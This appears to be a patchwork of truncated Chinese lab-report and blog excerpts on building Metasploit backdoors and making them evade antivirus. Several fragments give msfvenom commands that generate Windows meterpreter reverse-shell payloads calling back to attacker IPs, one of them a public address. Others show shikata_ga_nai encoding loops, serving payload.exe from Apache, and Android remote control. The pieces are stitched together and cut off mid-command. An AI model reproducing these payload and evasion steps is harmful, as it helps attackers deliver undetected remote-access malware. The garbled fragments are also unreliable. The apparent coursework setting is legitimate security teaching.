一、准备工作先在kali安装Apache2，下载代码如下sudoaptinstallapache2 启动Apache2服务serviceapache2start 在kali浏览器中输入你的kaliIP，得到该页面说明启动成功二、开始1.msf远控生成（1）在kali运行msf生成exemsfvenom-pwindows/meterpreter/reverse_t

1.实验内容学习了恶意代码和恶意代码的分析，并介绍了信息搜集技术和怎样进行信息搜集。2.实验过程1.1正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧（1）使用msf生成可执行文件并检测生成payload并检测msfvenom-pwindows/meterpreter/reverse_tcpLHOS

1.实验内容1.1实践内容（1）正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧使用msfvenom生成jar、apk等其他文件使用veil加壳工具使用C+shellcode进行编程（2）通过组合应用各种技术实现恶意代码免杀（3）用另一电脑实测，在杀软开启的情况下，可运行并回连成

1.实践内容(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧正确使用msf编码器，使用msfvenom生成如jar之类的其他文件veil，加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的，简单语言描述原理，不要截图。与

1.实验内容1.1实验内容(1)使用msfvenom和msf编码器生成文件使用msfvenom生成exe文件，并进行编码。生成jar文件，用于Java环境下的攻击。生成PHP文件，用于Web服务器上的攻击。(2)使用Veil工具生成恶意代码下载并安装Veil-Evasion，使用Veil生成恶意代码。(3)使用C+shellco

实验内容1.1实践内容正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧通过组合应用各种技术实现恶意代码免杀用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本1.2回答问题杀软是如何检测出恶意代码的？（1）特征码

1.实验内容1.1本周学习内容1.1.1后门实践中的基本概念netcat(瑞士军刀):用于监听、探测端口、正向连接、反向连接、文件传输。socat:netcat的加强版（多了SSL连接等功能）。Meterpreter工具：Metadploit框架中的扩展模块，是生成后门的工具。VeilEvasion:生成免杀的工具。1.1.2

202224252024-2025-1《网络与系统攻防技术》实验三实验报告目录1.实验内容2.实验问题3.实验过程3.1正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧3.2通过组合应用各种技术实现恶意代码免杀3.3用另一电脑实测，在杀软开启的情况下，可运行并回连成功，

(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133构建`msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.75.133lport=5000-fexe-o/root/payload.exe先转到/root然后把这个文件放在apache的网站下cd/root`cppayload.exe/var/www/html启动apa

一、实验内容1、方法对后门实验中的msf编码器进行进一步的探索使用，使用msfvenom指令生成如jar之类的文件，从而尝试达到免杀的目的；通过Veil等工具对目标程序进行加壳或者其他操作来实现免杀；使用C+ShellCode编程实现免杀；2、应用通过组合应用各种技术尽可能地实现恶意代码免杀

1.实验内容1.1实践内容(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧正确使用msf编码器，使用msfvenom生成如jar之类的其他文件veil，加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的，简单语言描述原

一、实验内容本次实验的目标在于运用多重加密、文件格式伪装、数据填充、加壳等技术方法达成恶意代码的免杀效果，生成恶意程序，并对其进行测试，以检验其能否成功躲避杀毒软件的检测。本次实验具体内容如下：1．正确使用msf编码器，使用msfvenom生成如jar之类的其他文件；2．能够使用veil，加壳

202224062024-2025-1《网络与系统攻防技术》实验三实验报告1.实验内容1.1实践内容正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧通过组合应用各种技术实现恶意代码免杀用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

1.实践内容1.1本周知识总结深入学习关于缓冲区溢出的基础知识。学习了关于后门的一些基础知识。1.2回答问题（1）杀软是如何检测出恶意代码的？病毒特征码检测加密文件分析基于行为检测的主动防御病毒云查杀（2）免杀是做什么？免杀，即Anti-AntiVirus（简写VirusAV

1.实践内容(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧正确使用msf编码器，使用msfvenom生成如jar之类的其他文件veil，加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的，简单语言描述原理，不要截图。与杀

1.实验内容正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧正确使用msf编码器，使用msfvenom生成如jar之类的其他文件veil，加壳工具使用C+shellcode编程通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软

大家好，我是Dest1ny。今天我们是红队专题中的远控安卓。这个实验会非常有趣，大家多多点赞！环境：一台有公网ip的vps/kali/带msf工具即可一台安卓手机（最好老一点，因为我们这里不涉及免杀）CLASS-1msfconsole和msfvenommsfconsole功能:msfconsole是Metasploit框架

模块含义auxiliary：主要包含渗透测试中一些辅助性脚本，这些脚本功能有扫描，嗅探，破解，注入，漏洞挖掘等。encoders：编码工具，用于躲过入侵检测和过滤系统。exploit：主要包括了exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这个目录下，这里边包括的exp的路径的命名规则是：

###生成payloadmsfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=39.97.167.211LPORT=6667--platformwindows-ax86HandLerSSLCert=./my.pemStagerVerifySSLCert=true-s42--smallest-ex86/shikata_ga_nai-i9-fraw|msfvenom--platformwindows-ax86

#Msfvenom场景有时候我们上传Shell到目标主机后，不仅我们自己可以连接，其他用户也可以连接，有时候会导致我们丢失该Shell，甚至该shell被用户发现并查杀，本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell实验环境【kali（攻击主机）】：192.168.10.131【win7（目标主机）】：19

实验环境：靶机Windowsserver2003  192.168.242.129攻击机kali 192.168.242.131实验工具：MetasploitFramework(MSF)实验过程：确定攻击机和靶机之间连通性 利用msfvenom生成远控木马msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序,并在目标机上

MSFvenom1.1MSFvenom介绍MSFvenom是Msfpayload和Msfencode的组合，可以生成各种攻击载荷，并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上，而msfvenom可以快速创建符合靶机的载荷，Msfvenom包含标准的命令行选项。可以为许多平台生成有效负载，如Android，Win

Metasploit之Msfvenom实战渗透-FreeBuf网络安全行业门户Metasploit(MSF)渗透测试入门-知乎(zhihu.com)1、介绍Msfvenom用于生成木马。-l,--list<type>#列出所有可用的项目，其中值可以被设置为payloads,encoders,nops,platforms,archs,encrypt,formats等等-p,

一、基础问题回答1、杀软是如何检测出恶意代码的？答：（1）检测特征码人有自己的特征，代码也有自己的特征。杀毒软件都有着一套特征库，依靠检索程序代码是否和库中特征码是否吻

windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-